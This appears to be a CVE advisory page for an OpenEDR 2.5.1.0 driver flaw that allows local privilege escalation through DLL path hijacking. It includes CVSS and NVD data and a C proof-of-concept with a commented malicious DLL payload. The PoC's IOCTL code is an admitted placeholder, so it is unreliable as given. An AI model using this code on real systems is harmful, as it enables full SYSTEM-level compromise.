Security Vulnerability Report
CVE-2025-69784 CVSS 8.8 HIGH

Published: 2026-03-16 16:16:13
Last Modified: 2026-03-20 13:51:52

Description

A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product. By redirecting this path to a user-writable location, an attacker can cause OpenEDR to load an attacker-controlled DLL into high-privilege processes. This results in arbitrary code execution with SYSTEM privileges, leading to full compromise of the affected system.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:xcitium:openedr:2.5.1.0:*:*:*:*:*:*:* - VULNERABLE
OpenEDR < 2.5.1.0
OpenEDR 2.5.1.0 (affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-69784 PoC - OpenEDR DLL Injection via IOCTL
// This PoC demonstrates modifying the DLL injection path via the vulnerable IOCTL
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <winioctl.h>

// Define the IOCTL code (example - actual value may vary)
#define IOCTL_MODIFY_DLL_PATH 0xDEADBEEF

int main(void)
{
    HANDLE hDevice;
    DWORD bytesReturned = 0;
    char maliciousPath[] = "C:\\Users\\Public\\malicious.dll";

    // Open handle to OpenEDR driver (ANSI variant so the narrow device name
    // also compiles in Unicode builds; the literal encodes \\.\OpenedrDevice)
    hDevice = CreateFileA(
        "\\\\.\\OpenedrDevice",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }
    printf("[+] Opened handle to OpenEDR driver\n");

    // Modify DLL injection path to user-writable location
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_MODIFY_DLL_PATH,
        maliciousPath,
        (DWORD)(strlen(maliciousPath) + 1),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (result) {
        printf("[+] DLL path modified to: %s\n", maliciousPath);
        printf("[+] Next DLL load will execute code with SYSTEM privileges\n");
    } else {
        printf("[-] Failed to modify DLL path. Error: %lu\n", GetLastError());
    }

    CloseHandle(hDevice);
    return 0;
}

// Example malicious DLL payload (malicious.c)
/*
#include <windows.h>
#include <stdlib.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Execute SYSTEM-level code here
        system("cmd.exe /c whoami > C:\\Users\\Public\\pwned.txt");
    }
    return TRUE;
}
*/

References

https://gist.github.com/ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba (Exploit)
https://github.com/ComodoSecurity/openedr (Product)
https://github.com/ComodoSecurity/openedr/issues/49 (Issue Tracking, Third Party Advisory)
https://scavengersecurity.com/posts/edr-as-rootkit-2/ (Exploit, Third Party Advisory)
https://www.openedr.com/ (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69784",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T16:16:13.460",
    "lastModified": "2026-03-20T13:51:52.123",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product. By redirecting this path to a user-writable location, an attacker can cause OpenEDR to load an attacker-controlled DLL into high-privilege processes. This results in arbitrary code execution with SYSTEM privileges, leading to full compromise of the affected system."
      },
      {
        "lang": "es",
        "value": "Un atacante local y no privilegiado puede abusar de una interfaz IOCTL vulnerable expuesta por el controlador del kernel OpenEDR 2.5.1.0 para modificar la ruta de inyección de DLL utilizada por el producto. Al redirigir esta ruta a una ubicación escribible por el usuario, un atacante puede hacer que OpenEDR cargue una DLL controlada por el atacante en procesos de alto privilegio. Esto resulta en ejecución de código arbitrario con privilegios de SYSTEM, lo que lleva a un compromiso total del sistema afectado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.0,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-427"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:xcitium:openedr:2.5.1.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "C2BE1711-EE54-4E5D-A6CD-40033932443C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/ikerl/c3ec81f12ded44c2e0ae2dfdacb562ba",
        "source": "[email protected]",
        "tags": ["Exploit"]
      },
      {
        "url": "https://github.com/ComodoSecurity/openedr",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/ComodoSecurity/openedr/issues/49",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Third Party Advisory"]
      },
      {
        "url": "https://scavengersecurity.com/posts/edr-as-rootkit-2/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.openedr.com/",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}